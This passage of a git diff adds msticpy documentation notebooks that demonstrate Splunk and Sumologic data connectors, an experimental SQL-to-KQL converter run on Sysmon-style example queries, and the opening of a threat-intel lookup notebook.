+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>TotalBytesSent</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>2020-07-02T10:00:00Z</td>\n",
+       "      <td>27055</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2020-07-02T09:00:00Z</td>\n",
+       "      <td>33777</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2020-07-02T08:00:00Z</td>\n",
+       "      <td>27355</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2020-07-02T07:00:00Z</td>\n",
+       "      <td>25544</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>2020-07-02T06:00:00Z</td>\n",
+       "      <td>11771</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "          TimeGenerated TotalBytesSent\n",
+       "0  2020-07-02T10:00:00Z          27055\n",
+       "1  2020-07-02T09:00:00Z          33777\n",
+       "2  2020-07-02T08:00:00Z          27355\n",
+       "3  2020-07-02T07:00:00Z          25544\n",
+       "4  2020-07-02T06:00:00Z          11771"
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "splunk_query = '''\n",
+    "search index=\"blackhat\" sourcetype=\"network\" earliest=0 \n",
+    "| table TimeGenerated, TotalBytesSent\n",
+    "'''\n",
+    "df = splunk_prov.exec_query(splunk_query)\n",
+    "df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## References\n",
+    "\n",
+    "- Splunk Enterprise SDK for Python: https://dev.splunk.com/enterprise/docs/devtools/python/sdk-python/\n",
+    "- Splunk Community : https://community.splunk.com/t5/Community/ct-p/en-us\n",
+    "- Splunk Documentation: https://docs.splunk.com/Documentation"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "185.554px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/SqlToKql.ipynb b/docs/notebooks/SqlToKql.ipynb
new file mode 100644
index 000000000..4ac8c5fb0
--- /dev/null
+++ b/docs/notebooks/SqlToKql.ipynb
@@ -0,0 +1,418 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# SQL TO KQL Conversion (Experimental)\n",
+    "\n",
+    "The `sql_to_kql` module is a simple converter to KQL based on [moz_sql_parser](https://github.com/DrDonk/moz-sql-parser).\n",
+    "It is an experimental feature built to help us convert a few queries but we\n",
+    "thought that it was useful enough to include in MSTICPy.\n",
+    "\n",
+    "You must have msticpy installed along with the moz_sql_parser package to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy[sql2kql]\n",
+    "```\n",
+    "\n",
+    "It supports a subset of ANSI SQL-92 which includes the following:\n",
+    "- SELECT (including column renaming and functions)\n",
+    "- FROM (including from subquery)\n",
+    "- WHERE (common string and int operations, LIKE, some common functions)\n",
+    "- LIMIT\n",
+    "- UNION, UNION ALL\n",
+    "- JOIN - only tested for relatively simple join expressions\n",
+    "- GROUP BY\n",
+    "- SQL Comments (ignored)\n",
+    "\n",
+    "It does not support HAVING, multiple SQL statements or anything complex like Common Table Expressions.\n",
+    "\n",
+    "It does support a few additional Spark SQL extensions like RLIKE.\n",
+    "\n",
+    "## Caveat Emptor!\n",
+    "This module is included in MSTICPy in the hope that it might be useful to others.\n",
+    "We do not intend to expand its capabilities.\n",
+    "\n",
+    "It is also not guaranteed to produce perfectly-executing KQL - there will likely\n",
+    "be things that you have to fix up in the output query. \n",
+    "You will, for example, nearly always need change\n",
+    "the names of the fields used since the source data tables are unlikely\n",
+    "to exactly match the schema of your Kusto/Azure Sentinel target.\n",
+    "\n",
+    "The module does include an elementary table name mapping function that we\n",
+    "demonstrate below.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Processing imports....\n",
+      "Checking configuration....\n",
+      "No errors found.\n",
+      "No warnings found.\n",
+      "Setting notebook options....\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>Notebook setup complete</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from pathlib import Path\n",
+    "import os\n",
+    "import sys\n",
+    "import warnings\n",
+    "from IPython.display import display, HTML, Markdown\n",
+    "            \n",
+    "from msticpy.nbtools import nbinit\n",
+    "nbinit.init_notebook(namespace=globals())\n",
+    "\n",
+    "from msticpy.data.sql_to_kql import sql_to_kql"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Simple SQL Query"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "apt29Host\n",
+      "| where Channel == 'Microsoft-Windows-Sysmon/Operational'\n",
+      "  and EventID between (1 .. 10)\n",
+      "  and tolower(ParentImage) endswith 'explorer.exe'\n",
+      "  and EventID in ('4', '5', '6')\n",
+      "  and tolower(Image) startswith '3aka3'\n",
+      "| project Message, Otherfield\n",
+      "| distinct Message, Otherfield\n",
+      "| limit 10\n"
+     ]
+    }
+   ],
+   "source": [
+    "sql = \"\"\"\n",
+    "SELECT DISTINCT Message, Otherfield\n",
+    "FROM apt29Host\n",
+    "WHERE Channel = \"Microsoft-Windows-Sysmon/Operational\"\n",
+    "    AND EventID BETWEEN 1 AND 10\n",
+    "    AND LOWER(ParentImage) LIKE '%explorer.exe'\n",
+    "    AND EventID IN ('4', '5', '6')\n",
+    "    AND LOWER(Image) LIKE \"3aka3%\"\n",
+    "LIMIT 10\n",
+    "\"\"\"\n",
+    "\n",
+    "kql = sql_to_kql(sql)\n",
+    "print(kql)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## SQL Joins"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "apt29Host\n",
+      "| project EventID, ParentImage, Image, Message, Otherfield\n",
+      "| join kind=inner (MyTable\n",
+      "  | project Message, evt_id) on $right.Message == $left.Message\n",
+      "  and $right.evt_id == $left.EventID\n",
+      "| where Channel == 'Microsoft-Windows-Sysmon/Operational'\n",
+      "  and EventID == 1\n",
+      "  and tolower(ParentImage) endswith 'explorer.exe'\n",
+      "  and tolower(Image) startswith '.*3aka3'\n",
+      "| summarize any(Message), any(Otherfield), dcount(EventID) by EventID\n",
+      "| order by Message desc, Otherfield\n",
+      "| limit 10\n"
+     ]
+    }
+   ],
+   "source": [
+    "sql=\"\"\"\n",
+    "SELECT DISTINCT Message, Otherfield, COUNT(DISTINCT EventID)\n",
+    "FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A\n",
+    "--FROM A\n",
+    "INNER JOIN (Select Message, evt_id FROM MyTable ) on MyTable.Message == A.Message and MyTable.evt_id == A.EventID\n",
+    "WHERE Channel = \"Microsoft-Windows-Sysmon/Operational\"\n",
+    "    AND EventID = 1\n",
+    "    AND LOWER(ParentImage) LIKE \"%explorer.exe\"\n",
+    "    AND LOWER(Image) RLIKE \".*3aka3%\"\n",
+    "GROUP BY EventID\n",
+    "ORDER BY Message DESC, Otherfield\n",
+    "LIMIT 10\n",
+    "\"\"\"\n",
+    "\n",
+    "kql = sql_to_kql(sql)\n",
+    "print(kql)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Table Renaming"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "SecurityEvent\n",
+      "| project EventID, ParentImage, Image, Message, Otherfield\n",
+      "| join kind=inner (SigninLogs\n",
+      "  | project Message, evt_id) on $right.Message == $left.Message\n",
+      "  and $right.evt_id == $left.EventID\n",
+      "| where Channel == 'Microsoft-Windows-Sysmon/Operational'\n",
+      "  and EventID == 1\n",
+      "  and tolower(ParentImage) endswith 'explorer.exe'\n",
+      "  and tolower(Image) startswith '.*3aka3'\n",
+      "| summarize any(Message), any(Otherfield), dcount(EventID) by EventID\n",
+      "| order by Message desc, Otherfield\n",
+      "| limit 10\n"
+     ]
+    }
+   ],
+   "source": [
+    "sql=\"\"\"\n",
+    "SELECT DISTINCT Message, Otherfield, COUNT(DISTINCT EventID)\n",
+    "FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A\n",
+    "INNER JOIN (Select Message, evt_id FROM MyTable ) on MyTable.Message == A.Message and MyTable.evt_id == A.EventID\n",
+    "WHERE Channel = \"Microsoft-Windows-Sysmon/Operational\"\n",
+    "    AND EventID = 1\n",
+    "    AND LOWER(ParentImage) LIKE \"%explorer.exe\"\n",
+    "    AND LOWER(Image) RLIKE \".*3aka3%\"\n",
+    "GROUP BY EventID\n",
+    "ORDER BY Message DESC, Otherfield\n",
+    "LIMIT 10\n",
+    "\"\"\"\n",
+    "\n",
+    "table_map = {\"apt29Host\": \"SecurityEvent\", \"MyTable\": \"SigninLogs\"}\n",
+    "\n",
+    "kql = sql_to_kql(sql, table_map)\n",
+    "print(kql)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Join with Aliases"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "SecurityEvent\n",
+      "| join kind=inner (SecurityEvent\n",
+      "  | where Channel == 'Microsoft-Windows-Sysmon/Operational'\n",
+      "  and EventID == 1\n",
+      "  and tolower(ParentImage) matches regex '.*partial.string.*'\n",
+      "  and tolower(Image) endswith 'cmd.exe'\n",
+      "  | project ProcessGuid) on $left.ParentProcessGuid == $right.ProcessGuid\n",
+      "| where Channel == 'Microsoft-Windows-Sysmon/Operational'\n",
+      "  and EventID == 1\n",
+      "  and tolower(Image) endswith 'powershell.exe'\n",
+      "| project Message\n"
+     ]
+    }
+   ],
+   "source": [
+    "sql=\"\"\"\n",
+    "SELECT Message\n",
+    "FROM apt29Host a\n",
+    "INNER JOIN (\n",
+    "    SELECT ProcessGuid\n",
+    "    FROM apt29Host\n",
+    "    WHERE Channel = \"Microsoft-Windows-Sysmon/Operational\"\n",
+    "        AND EventID = 1\n",
+    "        AND LOWER(ParentImage) RLIKE '.*partial_string.*'\n",
+    "        AND LOWER(Image) LIKE '%cmd.exe'\n",
+    ") b\n",
+    "ON a.ParentProcessGuid = b.ProcessGuid\n",
+    "WHERE Channel = \"Microsoft-Windows-Sysmon/Operational\"\n",
+    "    AND EventID = 1\n",
+    "    AND LOWER(Image) LIKE '%powershell.exe'\n",
+    "\"\"\"\n",
+    "\n",
+    "kql = sql_to_kql(sql, table_map)\n",
+    "print(kql)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Unions and Group By"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "SecurityEvent\n",
+      "| project EventID, ParentImage, Image, Message, Otherfield\n",
+      "| union (SecurityEvent\n",
+      "  | project EventID, ParentImage, Image, Message, Otherfield\n",
+      "  | join kind=inner (SigninLogs) on $right.mssg == $left.Message\n",
+      "  | where Channel == 'Microsoft-Windows-Sysmon/Operational'\n",
+      "  and EventID == 1\n",
+      "  and tolower(ParentImage) endswith 'explorer.exe'\n",
+      "  and tolower(Image) startswith '.*3aka3'\n",
+      "  | project Message, Otherfield, EventID\n",
+      "  | distinct Message, Otherfield, EventID\n",
+      ")\n",
+      "| distinct *\n",
+      "| limit 10\n",
+      "| summarize any(Message), count(Otherfield) by Message\n",
+      "| order by Message desc, Otherfield\n"
+     ]
+    }
+   ],
+   "source": [
+    "sql=\"\"\"\n",
+    "SELECT DISTINCT Message, COUNT(Otherfield)\n",
+    "FROM (SELECT *\n",
+    "    FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host)\n",
+    "\n",
+    "    UNION\n",
+    "    SELECT DISTINCT Message, Otherfield, EventID\n",
+    "    FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A\n",
+    "    INNER JOIN MyTable on MyTable.mssg = A.Message\n",
+    "    WHERE Channel = \"Microsoft-Windows-Sysmon/Operational\"\n",
+    "        AND EventID = 1\n",
+    "        AND LOWER(ParentImage) LIKE \"%explorer.exe\"\n",
+    "        AND LOWER(Image) RLIKE \".*3aka3%\"\n",
+    "    LIMIT 10\n",
+    "    )\n",
+    "GROUP BY Message\n",
+    "ORDER BY Message DESC, Otherfield\n",
+    "\"\"\"\n",
+    "\n",
+    "kql = sql_to_kql(sql, table_map)\n",
+    "print(kql)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Aliased and Calculated Select Columns"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "SecurityEvent\n",
+      "| extend ParentMessage = ParentImage + Message, Otherfield = tolower(Otherfield)\n",
+      "| project ID = EventID, ParentImage, Image, Message, ParentMessage, Otherfield\n",
+      "| where Channel == 'Microsoft-Windows-Sysmon/Operational'\n",
+      "  and EventID == 1\n",
+      "  and tolower(ParentImage) endswith 'explorer.exe'\n",
+      "| extend Otherfield = count(Otherfield)\n",
+      "| project mssg = Message, Otherfield\n",
+      "| distinct *\n"
+     ]
+    }
+   ],
+   "source": [
+    "sql=\"\"\"\n",
+    "SELECT DISTINCT Message as mssg, COUNT(Otherfield)\n",
+    "FROM (SELECT EventID as ID, ParentImage, Image, Message,\n",
+    "    ParentImage + Message as ParentMessage,\n",
+    "    LOWER(Otherfield) FROM apt29Host\n",
+    "    )\n",
+    "WHERE Channel = \"Microsoft-Windows-Sysmon/Operational\"\n",
+    "    AND EventID = 1\n",
+    "    AND LOWER(ParentImage) LIKE \"%explorer.exe\"\n",
+    "\"\"\"\n",
+    "kql = sql_to_kql(sql, table_map)\n",
+    "print(kql)"
+   ]
+  }
+ ],
+ "metadata": {
+  "history": [],
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "uuid": "c858a45f-dae9-4c23-9081-30d4c56ee45b",
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/Sumologic-DataConnector.ipynb b/docs/notebooks/Sumologic-DataConnector.ipynb
new file mode 100644
index 000000000..591cc2407
--- /dev/null
+++ b/docs/notebooks/Sumologic-DataConnector.ipynb
@@ -0,0 +1,276 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Sumologic - Data Connector"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Description\n",
+    "The data provider module of msticpy provides functions to allow for the defining of data sources, connectors to them and queries for them as well as the ability to return query result from the defined data sources. \n",
+    "\n",
+    "For more information on Data Propviders, check documentation\n",
+    "- Data Provider: https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html\n",
+    "\n",
+    "In this notebooks we will demonstrate Sumologic data connector feature of msticpy. \n",
+    "This feature is built on-top of the [Sumologic SDK for Python] (https://github.com/SumoLogic/sumologic-python-sdk) with some customizations and enhancements."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Installation"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:14:41.244954Z",
+     "start_time": "2020-08-07T19:14:41.241519Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "# Only run first time to install/upgrade msticpy to latest version\n",
+    "#%pip install --upgrade msticpy"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Authentication\n",
+    "\n",
+    "Authentication for the Sumologic data provider is handled by specifying credentials (accessid and accesskey) directly in the connect call or specifying the credentials in msticpy config file.\n",
+    "\n",
+    "For more information on how to create credentials, follow Sumologic Docs [Access Keys](https://help.sumologic.com/Manage/Security/Access-Keys) and [Users and Roles](https://help.sumologic.com/Manage/Users-and-Roles). The user should have permission to at least run its own searches or more depending upon the actions to be performed by user.\n",
+    "\n",
+    "Once you created user account with the appropriate roles, you will require the following details to specify while connecting\n",
+    "- url = \"https://api.us2.sumologic.com/api\" (Sumologic url endpoint depending on which region is used)\n",
+    "- accessid = \"xxx\" (as created in Sumologic user preferences)\n",
+    "- accesskey = \"xxx\" (same)\n",
+    "\n",
+    "Once you have details, you can specify it in `msticpyconfig.yaml` as shown in below example"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T17:50:18.361039Z",
+     "start_time": "2020-08-07T17:50:18.349006Z"
+    }
+   },
+   "source": [
+    "```\n",
+    "DataProviders:\n",
+    "  Sumologic:\n",
+    "    Args:\n",
+    "      connection_str: \"{Sumologic url endpoint}\"\n",
+    "      accessid: \"{accessid with search permissions to connect}\"\n",
+    "      accesskey: \"{accesskey of the user specified}\"\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:14:46.801520Z",
+     "start_time": "2020-08-07T19:14:44.889959Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Imports Complete\n"
+     ]
+    }
+   ],
+   "source": [
+    "#Check we are running Python 3.6\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "#imports\n",
+    "import pandas as pd\n",
+    "import msticpy.nbtools as nbtools\n",
+    "from datetime import datetime,timedelta\n",
+    "\n",
+    "#data library imports\n",
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "print('Imports Complete')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Instantiating a query provider\n",
+    "\n",
+    "You can instantiate a data provider for Sumologic by specifying the credentials in connect or in msticpy config file. \n",
+    "<br> If the details are correct and authentication is successful, it will show connected.\n",
+    "\n",
+    "URL endpoints are referenced on [Sumo Logic Endpoints and Firewall Security](https://help.sumologic.com/APIs/General-API-Information/Sumo-Logic-Endpoints-and-Firewall-Security)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:15:09.229632Z",
+     "start_time": "2020-08-07T19:15:08.536426Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "connected\n"
+     ]
+    }
+   ],
+   "source": [
+    "sumologic_prov = QueryProvider('Sumologic')\n",
+    "#sumologic_prov.connect(url=<url>, accessid=<accessid>, accesskey=<accesskey>)\n",
+    "sumologic_prov.connect()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Running a Ad-hoc Sumologic query\n",
+    "You can define your own sumologic query and run it via sumologic provider via `QUERY_PROVIDER.exec_query(<queryname>)`\n",
+    "\n",
+    "For more information, check documentation [Running and Ad-hoc Query](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#running-an-ad-hoc-query)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "sumologic_query = '''\n",
+    "*\n",
+    "| formatDate(_messageTime,\"yyyy/dd/MM HH:mm:ss\") as date\n",
+    "| first(date), last(date) by _sourceCategory\n",
+    "| count _sourceCategory,_first,_last\n",
+    "| sort -_count\n",
+    "'''\n",
+    "df = sumologic_prov.exec_query(sumologic_query, days=0.0005, verbosity=3)\n",
+    "df.head()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "sumologic_query = '''_index=WINDOWS | count _sourceCategory,hostname'''\n",
+    "df = sumologic_prov.exec_query(sumologic_query, start_time=datetime.now() - timedelta(days=6.001), end_time=datetime.now() - timedelta(days=6))\n",
+    "df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## References\n",
+    "\n",
+    "- Sumologic SDK for Python: https://github.com/SumoLogic/sumologic-python-sdk\n",
+    "- Sumologic Community : https://support.sumologic.com/hc/en-us/community/topics\n",
+    "- Sumologic Documentation: https://help.sumologic.com/"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.8.5"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "185.554px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
\ No newline at end of file
diff --git a/docs/notebooks/TIProviders.ipynb b/docs/notebooks/TIProviders.ipynb
new file mode 100644
index 000000000..40762a994
--- /dev/null
+++ b/docs/notebooks/TIProviders.ipynb
@@ -0,0 +1,2823 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# msticpy Threat Intel Lookup\n",
+    "This notebook describes the use of the Threat Intelligence lookup class in msticpy.\n",
+    "The class allows lookup of individual or multiple IoCs from one or more TI providers.\n",
+    "\n",
+    "TILookup is also extensible - you can subclass TIProvider to implement your own custom lookups. You can also subclass the HTTPProvider or KqlProvider classes, which provide support for querying a REST endpoint or Log Analytics table respectively.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "To use the Azure Sentinel Threat Intel provider you will also need the \"azsentinel\" components:\n",
+    "```\n",
+    "%pip install --upgrade msticpy[azsentinel]\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "toc": true
+   },
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#msticpy-Threat-Intel-Lookup\" data-toc-modified-id=\"msticpy-Threat-Intel-Lookup-1\">msticpy Threat Intel Lookup</a></span></li><li><span><a href=\"#TILookup-class\" data-toc-modified-id=\"TILookup-class-2\">TILookup class</a></span><ul class=\"toc-item\"><li><span><a href=\"#Available-Providers\" data-toc-modified-id=\"Available-Providers-2.1\">Available Providers</a></span></li><li><span><a href=\"#Configuration-File\" data-toc-modified-id=\"Configuration-File-2.2\">Configuration File</a></span></li><li><span><a href=\"#Looking-up-IoCs\" data-toc-modified-id=\"Looking-up-IoCs-2.3\">Looking up IoCs</a></span><ul class=\"toc-item\"><li><span><a href=\"#lookup_ioc\" data-toc-modified-id=\"lookup_ioc-2.3.1\">lookup_ioc</a></span></li><li><span><a href=\"#Lookup-an-IoC-from-a-single-provider\" data-toc-modified-id=\"Lookup-an-IoC-from-a-single-provider-2.3.2\">Lookup an IoC from a single provider</a></span><ul class=\"toc-item\"><li><span><a href=\"#Or-convert-result-to-a-DataFrame-and-let-pandas-do-the-display-work...\" data-toc-modified-id=\"Or-convert-result-to-a-DataFrame-and-let-pandas-do-the-display-work...-2.3.2.1\">Or convert result to a DataFrame and let pandas do the display work...</a></span></li></ul></li></ul></li><li><span><a href=\"#Lookup-using-all-primary-providers\" data-toc-modified-id=\"Lookup-using-all-primary-providers-2.4\">Lookup using all primary providers</a></span></li><li><span><a href=\"#Provider-Usage\" data-toc-modified-id=\"Provider-Usage-2.5\">Provider Usage</a></span><ul class=\"toc-item\"><li><span><a href=\"#Use-to-do-a-passive-DNS-lookup\" data-toc-modified-id=\"Use-to-do-a-passive-DNS-lookup-2.5.1\">Use to do a passive DNS lookup</a></span></li><li><span><a href=\"#Use-to-do-a-GeoIP-lookup\" data-toc-modified-id=\"Use-to-do-a-GeoIP-lookup-2.5.2\">Use to do a GeoIP lookup</a></span></li></ul></li><li><span><a href=\"#Inferring-IoC-Type-vs.-Specifying-explicity\" data-toc-modified-id=\"Inferring-IoC-Type-vs.-Specifying-explicity-2.6\">Inferring IoC Type vs. Specifying explicity</a></span></li><li><span><a href=\"#Looking-up-Multiple-IoCs\" data-toc-modified-id=\"Looking-up-Multiple-IoCs-2.7\">Looking up Multiple IoCs</a></span><ul class=\"toc-item\"><li><span><a href=\"#lookup_iocs\" data-toc-modified-id=\"lookup_iocs-2.7.1\">lookup_iocs</a></span></li><li><span><a href=\"#Multiple-IP-Lookup-from-single-provider\" data-toc-modified-id=\"Multiple-IP-Lookup-from-single-provider-2.7.2\">Multiple IP Lookup from single provider</a></span></li><li><span><a href=\"#Multiple-IoCs-using-all-providers\" data-toc-modified-id=\"Multiple-IoCs-using-all-providers-2.7.3\">Multiple IoCs using all providers</a></span></li><li><span><a href=\"#Multiple-Mixed-IoC-Types\" data-toc-modified-id=\"Multiple-Mixed-IoC-Types-2.7.4\">Multiple Mixed IoC Types</a></span></li></ul></li><li><span><a href=\"#Specifying-Time-Ranges\" data-toc-modified-id=\"Specifying-Time-Ranges-2.8\">Specifying Time Ranges</a></span></li></ul></li></ul></div>"
+   ]
+  },
+  {
+   "cell_type": "code",
